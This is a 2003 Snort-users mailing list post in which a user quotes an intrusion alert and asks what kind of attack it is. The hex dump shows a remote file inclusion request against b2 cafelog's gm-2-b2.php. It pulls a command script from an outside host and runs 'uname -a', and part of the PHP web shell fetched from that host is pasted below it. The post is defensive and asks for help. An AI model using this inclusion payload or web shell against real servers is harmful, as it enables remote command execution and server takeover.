[Snort-users] Is it an real attack ?

Roberto Samarone Araújo (RSA) sama at ...10714...
Mon Dec 29 04:09:07 EST 2003


Hi,

     Verifying the snort logs, I found the following attack:

[nessus] WEB-PHP b2 cafelog gm-2-b2.php remote command execution attempt

000 : 47 45 54 20 2F 2F 62 32 2D 74 6F 6F 6C 73 2F 67   GET //b2-tools/g
010 : 6D 2D 32 2D 62 32 2E 70 68 70 3F 62 32 69 6E 63   m-2-b2.php?b2inc
020 : 3D 68 74 74 70 3A 2F 2F 77 77 77 2E 63 6F 72 6E   =http://www.corn
030 : 61 67 65 2E 68 70 67 2E 63 6F 6D 2E 62 72 2F 63   age.hpg.com.br/c
040 : 6D 64 2E 74 78 74 3F 3F 26 63 6D 64 3D 75 6E 61   md.txt??&cmd=una
050 : 6D 65 25 32 30 2D 61 3F 26 63 6D 64 3D 75 6E 61   me%20-a?&cmd=una
060 : 6D 65 25 32 30 2D 61 3B 65 63 68 6F 25 32 30 58   me%20-a;echo%20X
070 : 46 54 45 41 4D 20 48 54 54 50 2F 31 2E 30 0D 0A   FTEAM HTTP/1.0..
080 : 48 4F 53 74 3A 20 43 69 72 2E 69 65 73 71 6D 6A   HOST: mysite.com-
090 : 50 61 7E 65 64 75 2E 62 42 0D 0A 3D 9A            mysite.com ....

I entered on the site: http://www.cornage.hpg.com.br/cmd.txt and I found the
following code:

-cmd  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  $output = str_replace("\n","\n-cmd ",$output);
  if (!empty($output)) echo  str_replace(">", ">", str_replace("<", "<",
$output));

?>

What kind of attack is this ? Are there any place where can I find
informations about this attack ?

Thanks,

Robert






More information about the Snort-users mailing list